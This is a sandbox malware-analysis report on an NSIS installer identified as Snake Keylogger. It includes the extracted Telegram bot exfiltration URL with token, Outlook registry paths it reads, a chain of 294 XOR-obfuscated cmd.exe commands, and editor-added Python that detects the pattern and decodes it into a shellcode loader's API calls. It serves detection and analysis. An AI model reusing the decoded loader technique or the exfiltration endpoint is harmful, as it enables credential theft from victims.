Overview

Overall score: 10

Score per task (1 to 10):

  Static                                                      3
  EKTEDIR.exe                          windows7-x64          10
  EKTEDIR.exe                          windows10-2004-x64    10
  $PLUGINSDIR/System.dll               windows7-x64           3
  $PLUGINSDIR/System.dll               windows10-2004-x64     3
  $PLUGINSDIR/nsExec.dll               windows7-x64           3
  $PLUGINSDIR/nsExec.dll               windows10-2004-x64     3
  Hylozoism/Forbundsformndene237.gen   windows7-x64           3
  Hylozoism/Forbundsformndene237.gen   windows10-2004-x64     3
  Hylozoism/Haardhudet.rav             windows7-x64           3
  Hylozoism/Haardhudet.rav             windows10-2004-x64     3
  Hylozoism/Herbiest116.vre            windows7-x64           3
  Hylozoism/Herbiest116.vre            windows10-2004-x64     3
  Hylozoism/Unfrail.nay                windows7-x64           3
  Hylozoism/Unfrail.nay                windows10-2004-x64     3
  Hylozoism/afrettelsers.stj           windows7-x64           3
  Hylozoism/afrettelsers.stj           windows10-2004-x64     3
  Hylozoism/figurally.txt              windows7-x64           1
  Hylozoism/figurally.txt              windows10-2004-x64     1
  Hylozoism/smudses.yde                windows7-x64           3
  Hylozoism/smudses.yde                windows10-2004-x64     3
  Occluding225.ten                     windows7-x64           3
  Occluding225.ten                     windows10-2004-x64     3

Analysis

  max time kernel:  146s
  max time network: 132s
  platform:         windows10-2004_x64
  resource:         win10v2004-20240704-en
  resource tags:    arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
  submitted:        09-07-2024 07:32

This report covers the windows10-2004-x64 run of EKTEDIR.exe (task behavioral2, score 10).
Static task
  static1

Behavioral tasks (task, sample, resource image)
  behavioral1    EKTEDIR.exe                          win7-20240704-en
  behavioral2    EKTEDIR.exe                          win10v2004-20240704-en
  behavioral3    $PLUGINSDIR/System.dll               win7-20240704-en
  behavioral4    $PLUGINSDIR/System.dll               win10v2004-20240704-en
  behavioral5    $PLUGINSDIR/nsExec.dll               win7-20240704-en
  behavioral6    $PLUGINSDIR/nsExec.dll               win10v2004-20240704-en
  behavioral7    Hylozoism/Forbundsformndene237.gen   win7-20240704-en
  behavioral8    Hylozoism/Forbundsformndene237.gen   win10v2004-20240704-en
  behavioral9    Hylozoism/Haardhudet.rav             win7-20240705-en
  behavioral10   Hylozoism/Haardhudet.rav             win10v2004-20240704-en
  behavioral11   Hylozoism/Herbiest116.vre            win7-20240708-en
  behavioral12   Hylozoism/Herbiest116.vre            win10v2004-20240704-en
  behavioral13   Hylozoism/Unfrail.nay                win7-20240708-en
  behavioral14   Hylozoism/Unfrail.nay                win10v2004-20240704-en
  behavioral15   Hylozoism/afrettelsers.stj           win7-20240708-en
  behavioral16   Hylozoism/afrettelsers.stj           win10v2004-20240708-en
  behavioral17   Hylozoism/figurally.txt              win7-20240704-en
  behavioral18   Hylozoism/figurally.txt              win10v2004-20240704-en
  behavioral19   Hylozoism/smudses.yde                win7-20240704-en
  behavioral20   Hylozoism/smudses.yde                win10v2004-20240704-en
  behavioral21   Occluding225.ten                     win7-20240704-en
  behavioral22   Occluding225.ten                     win10v2004-20240704-en

The samples other than EKTEDIR.exe are files extracted from it. $PLUGINSDIR is the directory an NSIS installer unpacks its plug-ins into, and System.dll (the System plug-in, which lets the installer script call arbitrary Win32 APIs) and nsExec.dll (which runs a command and can capture its output) are standard NSIS plug-ins, so EKTEDIR.exe is an NSIS-built installer that carries the Hylozoism/* files and Occluding225.ten as data.
General

  Target:  EKTEDIR.exe
  Size:    775KB
  MD5:     0d0f944239a7dd07826e28edf9647185
  SHA1:    3911f09935fb37f9f6cc3ff990e12e6143282d8a
  SHA256:  c58de5f40be8fd760fc08b1ef7ae5a3f5771dbc214426156e3a21a89bb8303fc
  SHA512:  e5077fa3179d7082587d606b8c8c6b5c0d74794225394522d92a06295e962a1cdb9868ac415720e3908222cc6c55312d24868be8d8ec2e52ef81243080fe5b7e
  SSDEEP:  12288:7akAv7gfFvt8pjs0p1cvxM/r9RKGqHmIdD+c:+kiext2Y0QMz9RKHHF9D
Malware Config

Extracted
  Family: snakekeylogger
  C2 / exfiltration URL: https://api.telegram.org/bot7377884885:AAGDE6_d9hXHQkXeQnXVnXZia5CIJu4gajM/sendMessage?chat_id=7161549085

The URL is the Telegram Bot API sendMessage endpoint. The segment after /bot is the attacker's bot token and chat_id is the receiving chat; together they identify this operator, so keep both as indicators, and treat outbound TLS to api.telegram.org from a process running out of %TEMP% as the network-side detection point for this sample.
Signatures

Snake Keylogger
  Keylogger and infostealer first seen in November 2020.

Snake Keylogger payload (2 IoCs)
  YARA rule family_snakekeylogger matched two regions dumped from the memory of PID 2124, the second EKTEDIR.exe instance:
    behavioral2/memory/2124-974-0x00000000004A0000-0x00000000016F4000-memory.dmp
    behavioral2/memory/2124-975-0x00000000004A0000-0x00000000004C6000-memory.dmp

Loads dropped DLL (64 IoCs)
  64 load events, all by PID 2392 EKTEDIR.exe, consistent with an NSIS installer loading the plug-ins it extracts to $PLUGINSDIR (System.dll and nsExec.dll appear in the task list above).

Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk, where infostealers often target it.

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.

Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  EKTEDIR.exe (PID 2124, per the process tree) opened these keys; all three name the same profile GUID:
    \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)

Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
    flow 47: checkip.dyndns.org

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
    PID 2124 EKTEDIR.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
    PID 2392 EKTEDIR.exe
    PID 2124 EKTEDIR.exe

Suspicious use of SetThreadContext (1 IoC)
    PID 2392 EKTEDIR.exe set the thread context of PID 2124 EKTEDIR.exe
  The payload was found only in PID 2124's memory, so the installer starts a second copy of itself as a host process and redirects that child's thread into the injected Snake Keylogger; both processes also hide their threads from debuggers.

Drops file in Program Files directory (2 IoCs)
    File created:               C:\Program Files (x86)\Common Files\rampire.lnk (EKTEDIR.exe)
    File opened for modification: C:\Program Files (x86)\breplanerne\Pist.ini (EKTEDIR.exe)

Drops file in Windows directory (2 IoCs)
    File opened for modification: C:\Windows\Fonts\sysselstter\Complexer.ini (EKTEDIR.exe)
    File opened for modification: C:\Windows\resources\0409\Markazes\Sprtter.Dem (EKTEDIR.exe)

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (2 IoCs)
    PID 2124 EKTEDIR.exe (2 events)

Suspicious behavior: MapViewOfSection (1 IoC)
    PID 2392 EKTEDIR.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
    Token SeDebugPrivilege: PID 2124 EKTEDIR.exe

Suspicious use of WriteProcessMemory (64 IoCs)
  PID 2392 EKTEDIR.exe wrote to the memory of its cmd.exe children, three writes per child; the list stops at 64 entries and covers these child PIDs in order (4956 recurs because Windows reuses the ID of an exited process):
    4956, 3080, 3916, 3440, 1168, 4436, 548, 5016, 1156, 2772, 4828, 1432, 3068, 1852, 4956, 5084, 4132, 4940, 4928, 2072, 5032, 760

outlook_office_path (1 IoC)
    Key opened: \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (EKTEDIR.exe)

outlook_win_path (1 IoC)
    Key opened: \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (EKTEDIR.exe)
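The signatures above describe two process-level behaviours worth alerting on: one parent creating a long run of cmd.exe children that each evaluate a single `set /a` expression, and the installer launching a second copy of itself and then setting that child's thread context. The Python below is an example added by the editor, not part of the sandbox report; it runs those two checks over constructed process-creation records in a Sysmon Event ID 1-like shape (the field names, the sample events, the PIDs of the cmd.exe children and the threshold are assumptions; the real run had 294 such children).

```python
"""Flag the parent/child pattern from the signatures in process-creation telemetry.

Editor's example, not part of the sandbox report. Records are constructed here in a
Sysmon Event ID 1 shape; field names and the threshold are assumptions.
"""
import re
from collections import defaultdict

# A cmd.exe child whose entire job is one XOR, e.g.  cmd.exe /c set /a "250^177"
SET_A_XOR_RE = re.compile(r'(?i)\bset\s+/a\s+"?\d+\^\d+"?\s*$')

LOADER = r"C:\Users\Admin\AppData\Local\Temp\EKTEDIR.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# First 20 operands of the chain seen in the report; with key 177 they spell "KERNEL32::CreateFile".
XOR_OPERANDS = [250, 244, 227, 255, 244, 253, 130, 131, 139, 139,
                242, 195, 212, 208, 197, 212, 247, 216, 221, 212]


def make_event(ppid, parent_image, pid, image, cmdline):
    """One process-creation record (constructed; Sysmon-like field names)."""
    return {"ParentProcessId": ppid, "ParentImage": parent_image,
            "ProcessId": pid, "Image": image, "CommandLine": cmdline}


# Constructed sample: a slice of the loader's chain plus ordinary desktop activity.
SAMPLE_EVENTS = (
    [make_event(2392, LOADER, 5000 + i, CMD, f'cmd.exe /c set /a "{n}^177"')
     for i, n in enumerate(XOR_OPERANDS)]
    + [make_event(2392, LOADER, 2124, LOADER, f'"{LOADER}"')]  # self-spawn, later SetThreadContext target
    + [make_event(1000, EXPLORER, 1001, CMD, "cmd.exe /c dir"),
       make_event(1000, EXPLORER, 1002, CMD, 'cmd.exe /c set /a "1+1"'),  # arithmetic, not XOR
       make_event(1000, EXPLORER, 1003, r"C:\Windows\System32\notepad.exe", "notepad.exe")]
)


def find_xor_bursts(events, threshold=10):
    """Return {parent_pid: [child_pid, ...]} for parents that spawned at least
    `threshold` cmd.exe children whose command line is nothing but a set /a XOR."""
    per_parent = defaultdict(list)
    for e in events:
        if e["Image"].lower().endswith("\\cmd.exe") and SET_A_XOR_RE.search(e["CommandLine"]):
            per_parent[e["ParentProcessId"]].append(e["ProcessId"])
    return {ppid: kids for ppid, kids in per_parent.items() if len(kids) >= threshold}


def find_self_spawns(events):
    """Return (parent_pid, child_pid, image) where a process launches a second copy of its
    own executable; paired with SetThreadContext on that child it is the hollowing pattern."""
    return [(e["ParentProcessId"], e["ProcessId"], e["Image"])
            for e in events if e["Image"].lower() == e["ParentImage"].lower()]


if __name__ == "__main__":
    for ppid, kids in find_xor_bursts(SAMPLE_EVENTS).items():
        print(f"XOR burst: parent {ppid} spawned {len(kids)} set /a children")
    for ppid, pid, image in find_self_spawns(SAMPLE_EVENTS):
        print(f"self-spawn: {ppid} -> {pid} ({image})")
```

The burst check keys on the shape of the command line rather than on the key 177, so a sample that changes the key still trips it; the threshold is the knob to tune against legitimate batch scripts, which rarely run even ten separate `set /a` processes under one parent.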
Processes

C:\Users\Admin\AppData\Local\Temp\EKTEDIR.exe (PID 2392, top level)
  Command line: "C:\Users\Admin\AppData\Local\Temp\EKTEDIR.exe"
  Signatures: Loads dropped DLL; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Drops file in Program Files directory; Drops file in Windows directory; Suspicious behavior: MapViewOfSection; Suspicious use of WriteProcessMemory

  Children of PID 2392: 294 instances of C:\Windows\SysWOW64\cmd.exe, each launched as

      cmd.exe /c set /a "N^177"

  `set /a` evaluates the expression and prints the result, so each child computes one byte (N XOR 177) for its parent; the operand N changes per child while the key 177 is constant. The children are listed below in spawn order as PID:N. PIDs recur (4956, 1168, 760 and others) because Windows reuses the ID of an exited process.

    4956:250  3080:244  3916:227  3440:255  1168:244  4436:253
    548:130   5016:131  1156:139  2772:139  4828:242  1432:195
    3068:212  1852:208  4956:197  5084:212  4132:247  4940:216
    4928:221  2072:212  5032:240  760:153   1384:220  4588:145
    4340:195  1068:133  3936:145  3192:157  688:145   1632:216
    4384:145  1168:129  372:201   4880:137  5104:129  1880:129
    3544:129  3684:129  912:129   2012:129  4560:129  4116:157
    3852:145  212:216   3080:145  2288:129  632:157   4736:145
    4464:193  1492:145  2108:129  1840:157  4216:145  4660:216
    4036:145  4220:133  4420:157  3808:145  4024:216  216:145
    876:129   1100:201  4032:137  1760:129  2244:157  1788:145
    2632:216  1336:145  760:129   4724:152  2712:216  1984:159
    3692:195  5072:132  4256:141  3244:250  1268:244  1632:227
    3108:255  744:244   116:253   228:130   4748:131  4632:139
    2772:139  1340:231  4036:216  3988:195  4560:197  1588:196
    3936:208  1376:221  3260:240  3172:221  4928:221  4992:222
    3696:210  4536:153  2892:216  3536:145  3888:129  3248:157
    4408:216  1948:145  3988:133  3572:132  5072:135  4672:128
    736:134   876:128   2924:132  632:131   804:157   3844:145
    1564:216  2108:145  4572:129  1156:201  1636:130  4724:129
    1508:129  4088:129  3724:157  4116:145  3504:216  4024:145
    2324:129  4132:201  3172:133  4928:129  4420:152  4504:193
    4664:159  3804:195  436:128   1784:141  1324:250  5052:244
    2012:227  2832:255  3904:244  3852:253  4492:130  1332:131
    1268:139  208:139   3468:226  4072:212  2560:197  4172:247
    2632:216  1336:221  4568:212  760:225   4908:222  1060:216
    4844:223  448:197   4852:212  2696:195  3936:153  2868:216
    2288:145  2924:195  4736:132  548:157   4420:145  1564:216
    1276:145  4068:135  436:134   3796:134  3684:145  396:157
    1048:145  3692:216  2692:145  5072:129  2104:157  3464:216
    4004:145  1540:129  2312:152  4644:216  1868:159  3388:195
    2108:130  1880:141  4968:250  3248:244  2904:227  1508:255
    4340:244  1520:253  3808:130  1588:131  3504:139  212:139
    1904:227  3508:212  804:208   3844:213  1240:247  1996:216
    2768:221  384:212   1784:153  1324:216  4360:145  1344:195
    2832:132  5104:157  4560:145  5084:216  3740:145  3260:195
    4588:128  4032:157  4488:145  4464:216  1900:145  5016:133
    2772:132  4568:135  2456:128  5052:134  1184:128  4056:132
    3568:131  3588:157  876:155   3460:216  4384:145  3508:129
    3424:157  508:145   1328:216  532:145   1840:129  1468:152
    960:216   3980:159  3068:195  4176:130  3536:141  4652:196
    1332:194  4132:212  2288:195  1400:130  3508:131  4488:139
    5004:139  4880:242  2892:208  1840:221  436:221   3636:230
    1984:216  2280:223  3852:213  800:222   376:198   2700:225
    3464:195  1904:222  4384:210  548:240   3424:153  2628:216
    1240:145  4324:195  3704:128  1340:145  760:157   4360:216
    2268:145  4788:129  3808:157  5040:216  1376:145  948:129
    1684:157  2172:145  1184:216  3316:145  1392:129  4488:157
    2744:145  1524:216  3544:145  1604:129  2456:152  4036:141

  C:\Users\Admin\AppData\Local\Temp\EKTEDIR.exe (PID 2124, child of 2392)
    Command line: "C:\Users\Admin\AppData\Local\Temp\EKTEDIR.exe"
    Signatures: Accesses Microsoft Outlook profiles; Suspicious use of NtCreateThreadExHideFromDebugger; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; outlook_office_path; outlook_win_path

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2896, top level; a background Edge utility process, not spawned by the sample)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3060,i,7252135083366563450,1411796122645726339,262144 --variations-seed-version --mojo-platform-channel-handle=4604 /prefetch:8
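The XOR chain in the process tree can be decoded offline. The Python below is an example added by the editor, not code from the sandbox or from the sample: it carries the 294 operands transcribed from the cmd.exe children in spawn order, applies the constant key 177 to each, and splits the result on the '<' character that ends each decoded string (treating '<' as a delimiter is an assumption, as are the function names). Decoded, the chain is five NSIS System plug-in call strings, which is the loader's actual logic: open a file whose path sits in NSIS register $4, allocate 45,617,152 bytes of RWX memory, seek to offset 677, read the file into the buffer and jump into it through CallWindowProcA. Each byte is handed back to the installer by a separate cmd.exe, presumably captured through the nsExec plug-in, so the strings never appear in clear in the installer script.

```python
"""Decode the cmd.exe `set /a "N^177"` chain from the process tree.

Editor's example, not part of the sandbox report or of the sample. OPERANDS are
transcribed, in spawn order, from the 294 cmd.exe children of PID 2392.
"""
import re

XOR_KEY = 177  # the constant right-hand operand in every child command line

# Operands transcribed from the process tree (one per cmd.exe child, spawn order).
OPERANDS = [
    250, 244, 227, 255, 244, 253, 130, 131, 139, 139,
    242, 195, 212, 208, 197, 212, 247, 216, 221, 212,
    240, 153, 220, 145, 195, 133, 145, 157, 145, 216,
    145, 129, 201, 137, 129, 129, 129, 129, 129, 129,
    129, 157, 145, 216, 145, 129, 157, 145, 193, 145,
    129, 157, 145, 216, 145, 133, 157, 145, 216, 145,
    129, 201, 137, 129, 157, 145, 216, 145, 129, 152,
    216, 159, 195, 132, 141,
    250, 244, 227, 255, 244, 253, 130, 131, 139, 139,
    231, 216, 195, 197, 196, 208, 221, 240, 221, 221,
    222, 210, 153, 216, 145, 129, 157, 216, 145, 133,
    132, 135, 128, 134, 128, 132, 131, 157, 145, 216,
    145, 129, 201, 130, 129, 129, 129, 157, 145, 216,
    145, 129, 201, 133, 129, 152, 193, 159, 195, 128,
    141,
    250, 244, 227, 255, 244, 253, 130, 131, 139, 139,
    226, 212, 197, 247, 216, 221, 212, 225, 222, 216,
    223, 197, 212, 195, 153, 216, 145, 195, 132, 157,
    145, 216, 145, 135, 134, 134, 145, 157, 145, 216,
    145, 129, 157, 216, 145, 129, 152, 216, 159, 195,
    130, 141,
    250, 244, 227, 255, 244, 253, 130, 131, 139, 139,
    227, 212, 208, 213, 247, 216, 221, 212, 153, 216,
    145, 195, 132, 157, 145, 216, 145, 195, 128, 157,
    145, 216, 145, 133, 132, 135, 128, 134, 128, 132,
    131, 157, 155, 216, 145, 129, 157, 145, 216, 145,
    129, 152, 216, 159, 195, 130, 141,
    196, 194, 212, 195, 130, 131, 139, 139, 242, 208,
    221, 221, 230, 216, 223, 213, 222, 198, 225, 195,
    222, 210, 240, 153, 216, 145, 195, 128, 145, 157,
    216, 145, 129, 157, 216, 145, 129, 157, 145, 216,
    145, 129, 157, 145, 216, 145, 129, 152, 141,
]

# Matches a child command line as the sandbox shows it, e.g.  cmd.exe /c set /a "250^177"
SET_A_RE = re.compile(r'set\s+/a\s+"(\d+)\^(\d+)"', re.IGNORECASE)


def parse_set_a(cmdline):
    """Return (operand, key) from one cmd.exe command line, or None if it is not a set /a XOR."""
    m = SET_A_RE.search(cmdline)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def decode_bytes(operands, key=XOR_KEY):
    """Each child printed operand ^ key, i.e. one character; join them into the plaintext."""
    return "".join(chr(n ^ key) for n in operands)


def split_calls(text, sep="<"):
    """Split the decoded stream into the individual call strings (assumed '<' delimiter)."""
    return [part for part in text.split(sep) if part]


def decode_process_tree(cmdlines):
    """Pipeline over raw command lines: keep set /a children, require one key, decode, split."""
    operands, keys = [], set()
    for line in cmdlines:
        parsed = parse_set_a(line)
        if parsed:
            operands.append(parsed[0])
            keys.add(parsed[1])
    if len(keys) != 1:
        raise ValueError(f"expected exactly one XOR key, saw {sorted(keys)}")
    return split_calls(decode_bytes(operands, keys.pop()))


if __name__ == "__main__":
    for call in split_calls(decode_bytes(OPERANDS)):
        print(call)
```

The five decoded strings, in order, are:

  KERNEL32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
  KERNEL32::VirtualAlloc(i 0,i 45617152, i 0x3000, i 0x40)p.r1
  KERNEL32::SetFilePointer(i r5, i 677 , i 0,i 0)i.r3
  KERNEL32::ReadFile(i r5, i r1, i 45617152,*i 0, i 0)i.r3
  user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0)

In System plug-in syntax `i`, `p` and `m` are int, pointer and ANSI-string parameters, `rN` reads NSIS register $N, `*i 0` passes a pointer to an int, and a trailing `.rN` stores the return value in $N. Read with the Win32 constants: CreateFileA(path in $4, GENERIC_READ, no sharing, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) into $5; VirtualAlloc(NULL, 45617152, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) into $1; SetFilePointer($5, 677, NULL, FILE_BEGIN); ReadFile($5, $1, 45617152, &0, NULL); then CallWindowProcA with $1 as the "window procedure", which transfers control into the freshly read bytes. The path in $4 is set elsewhere in the script and is not recoverable from this report. For hunting, the observable is the process tree itself: hundreds of `cmd.exe /c set /a "<n>^<k>"` children under one parent, followed by that parent spawning a copy of itself.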
Network
MITRE ATT&CK Enterprise v15
Downloads

File 1
  Filesize: 11KB
  MD5:      4d3b19a81bd51f8ce44b93643a4e3a99
  SHA1:     35f8b00e85577b014080df98bd2c378351d9b3e9
  SHA256:   fda0018ab182ac6025d2fc9a2efcce3745d1da21ce5141859f8286cf319a52ce
  SHA512:   b2ba9c961c0e1617f802990587a9000979ab5cc493ae2f8ca852eb43eeaf24916b0b29057dbff7d41a1797dfb2dce3db41990e8639b8f205771dbec3fd80f622

File 2
  Filesize: 6KB
  MD5:      3eb4cd50dcb9f5981f5408578cb7fb70
  SHA1:     13b38cc104ba6ee22dc4dfa6e480e36587f4bc71
  SHA256:   1c2f19e57dc72587aa00800a498c5f581b7d6761dc13b24bcf287ea7bd5ca2bf
  SHA512:   5a0c9d28df7a77e157046dce876282c48f434a441ee34e12b88f55be31be536eff676f580adbe4586da3f1519f94b5793ccbb3068b4b009eee286c0c5135d324